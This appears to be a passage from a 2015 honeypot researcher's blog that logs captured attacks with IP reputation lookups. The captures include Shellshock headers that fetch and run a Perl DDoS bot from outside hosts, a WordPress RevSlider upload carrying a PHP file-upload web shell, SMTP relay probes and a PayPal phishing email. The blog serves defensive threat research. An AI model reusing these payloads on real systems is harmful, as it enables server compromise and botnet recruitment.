User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://46.38.251.16/favi
con.icon;curl http://46.38.251.16/favicon.icon;GET http://46.38.251.16/favicon.icon;lwp-download http://46.38.251.16/favicon.i
con;lynx http://46.38.251.16/favicon.icon ");'
Host: 195.169.125.87
Connection: Close
Sadly I get a connection refused by the server, so I am unable to get the specified file.

The source IP
Blacklist StatusBLACKLISTED 13/40
IP Address211.144.37.41 ( Websites Lookup )
Reverse DNSUnknown
ASNAS9811
ASN Ownersrit corp.,beijing.
ISPChina Network Information Center
ContinentAsia

The download IP
Blacklist StatusPOSSIBLY SAFE 0/40
IP Address46.38.251.16 ( Websites Lookup )
Reverse DNSv220100240662590.yourvserver.net
ASNAS197540
ASN Ownernetcup GmbH
ISPnetcup GmbH
ContinentEurope

IBM XForce data for 211.144.37.41
"cats": {
      "Anonymisation Services": 86,
      "Spam": 100
   },
   "geo": {
      "country": "China",
      "countrycode": "CN"
   },

Sonntag, 30. August 2015

The /tmUnblock.cgi attack

I guess you all know about the /tmUnblock.cgi stuff, like discussed on SANS.
Basically this is all about an Linksys related vulnerability.

To clean up my vacation logs :-) I will just post the IPs I have seen

 110.170.205.51
 119.42.100.97
 184.63.49.75
 188.66.67.75
 189.111.224.206
 24.5.88.185
 62.16.232.164
 72.131.123.9
 72.230.248.73
 73.169.21.22
 79.18.235.38
 104.220.0.141
 149.129.69.111
 193.106.234.32
 208.91.177.236
 67.242.13.119
 68.51.170.119
 75.128.82.173
 89.232.118.181

Dienstag, 18. August 2015

Open SMTP relay search - gogo@linwayedm.com.tw

I received the following request on all of my honeypots
BEGIN OF SMTP DATA
177.70.77.242
Country: BR RiskScore: 5.7 Malware: []
uwfdphjcaq@163.com
gogo@linwayedm.com.tw
507
Message-ID: <KUOQLISRUMNOCFSJTHUIL@163.com>
From: "0806" <ltcxjrerz@163.com>
Reply-To: "0806" <darnexinwsq@163.com>
To: gogo@linwayedm.com.tw
Subject: BC_195.169.125.87
Date: Tue, 18 Aug 2015 09:31:21 +0500
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="--585038594152556471"
X-Priority: 3
X-MSMail-Priority: Normal

----585038594152556471
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable



----585038594152556471--

End of DataEND OF DATA
Actually, I think this is pretty nice. The attacker searches for open smtp relay servers by sending an email to gogo@linwayedm.com.tw with the subject BC_<IPaddress>. So if you have a SPAM honeypo you maybe want to subscribe :-)


Blacklist StatusBLACKLISTED 5/40
IP Address177.70.77.242 ( Websites Lookup )
Reverse DNS242.77.70.177.mksnet.com.br
ASNUnknown
ASN OwnerUnknown
ISPUnknown
ContinentSouth America

Sonntag, 16. August 2015

Perl DDoS Bot - 222.241.151.149

BEGIN OF HTTP DATA:
2015-08-16 17:09:08
Source IP: 222.241.151.149
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://www.7soles.com/js
/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://www.7soles.com/js/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*");'
Host: 109.234.106.8
Connection: Close
The downloadable perl script is identified as
a2.log: Perl.ShellBot-4 FOUND


Blacklist StatusBLACKLISTED 5/40
IP Address222.241.151.149 ( Websites Lookup )
Reverse DNSUnknown
ASNAS4134
ASN OwnerChinanet
ISPChinanet Hunan Province Network
ContinentAsia
Country CodeFlag (CN) China
Latitude / Longitude28.1792 / 113.114
CityChangsha
RegionHunan

Donnerstag, 13. August 2015

fiducia.de branded PayPal SPAM - 136.243.226.145

I received two Paypal SPAM emails

Message-ID: <55CB7A6D.A9A1ACC4@jsany.me>
Date: Wed, 12 Aug 2015 16:55:09 +0200
From: "www.vr.de" <info@jsany.me>
Subject:
 109.234.106.8:25:info@jsany.me:info:"www.vr.de"<info@jsany.me>:nossl::::0:
To: check212016@gmail.com
Content-Type: multipart/mixed;
 boundary="IQEb8Kelq9=_nIw8HiEcGKJxgVtTg4sapX"
MIME-Version: 1.0
X-Mailer: Mozilla 3.04 (WinNT; I)

This is a multi-part message in MIME format
The body of the email sounds like a PayPal email
Hallo lieber PayPal Kunde,
Bitte helfen Sie uns dabei, Ihr Konto wieder in Ordnung zu bringen. Bi=
s dahin haben wir den Zugang zu Ihrem Konto vor=C3=BCbergehend eingesc=
hr=C3=A4nkt.Wo liegt das Problem?Bei Ihrer Kreditkarte sind uns ungew=C3=
=B6hnliche Aktivit=C3=A4ten aufgefallen.Verifizieren Sie sich durch ei=
n Abgleich Ihrer Daten um Ihr Konto wieder Uneingeschr=C3=A4nkt nutzen=
 zu k=C3=B6nnen.Was mache ich jetzt ?

Schritt 1: =C3=96ffnen sie das Formular im Anhang
Schritt 2: Best=C3=A4tigen Sie in Ihrem PayPal-Konto IhreBankdaten
Schritt 3: Verifizieren Sie Ihre Kreditkarte
PayPal Email ID: 6741-9940Viele Gr=C3=BC=C3=9FeIhr Team von PayPal Deu=
tschland522883572783056722171403984794
attached was a document.html file, which looks like the basic login mask for PayPal.

You can find the full message and the decoded document on my Drive Share 
the password is "spam"

IBM Xforce shows a risk of 5.7 and the IP is known for SPAM activity.

Sonntag, 9. August 2015

SSTP establishment - 109.234.39.46

BEGIN OF HTTPS DATA:
2015-08-08 14:25:47
Source IP: 109.234.39.46
Country: RU RiskScore: 1 Malware: []
SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1
Host: 109.234.106.8
SSTPCORRELATIONID: {5a433238-8781-11e3-b2e4-4e6d617021}
Content-Length: 18446744073709551615
This request reached the HTTPS part of my honeypot yesterday. I am posting this more out or curiostity as it is the first time I see this type of requests, A bit googling lead to
https://msdn.microsoft.com/en-us/library/cc247364.aspx and shows that this is part of an Microsoft Secure Socket Tunneling Protocol (SSTP) initialization.

Analysis Date2 seconds ago
Blacklist StatusPOSSIBLY SAFE 0/40
IP Address109.234.39.46 ( Websites Lookup )
Reverse DNSserver6.com
ASNAS35415
ASN OwnerWebaZilla B.V.
ISPMcHost.Ru
ContinentEurope
Country CodeFlag (RU) Russian Federation
Latitude / Longitude55.75 / 37.6166
CityUnknown
RegionUnknown

Samstag, 8. August 2015

Wordpress NULLpOint7r__zemua.php - 192.203.127.198

BEGIN OF HTTP DATA:
2015-08-07 18:24:03
Source IP: 192.203.127.198
Country: US RiskScore: 1 Malware: []
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: johest.de
Content-Length: 654
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1

--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="action"

revslider_ajax_action
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="client_action"

update_plugin
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"
Content-Type: text/html

<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
--d7711a4c77de4aff8673ca44662115c1--
received yesterday on my honeypot.
The attack seems to be optimized for Wordpress and targets  /wp-admin/admin-ajax.php directly. As you can see in the code, it tries to upload a php file.

IBM XForce has no record on this ip.

IPVoid instead:
Analysis Date2 seconds ago
Blacklist StatusBLACKLISTED 2/40
IP Address192.203.127.198 ( Websites Lookup )
Reverse DNSUnknown
ASNAS7018
ASN OwnerAT&amp;T Services, Inc.
ISPTuskegee University
ContinentNorth America
Country CodeFlag (US) United States
Latitude / Longitude32.4172 / -85.7191
CityTuskegee Institute
RegionAlabama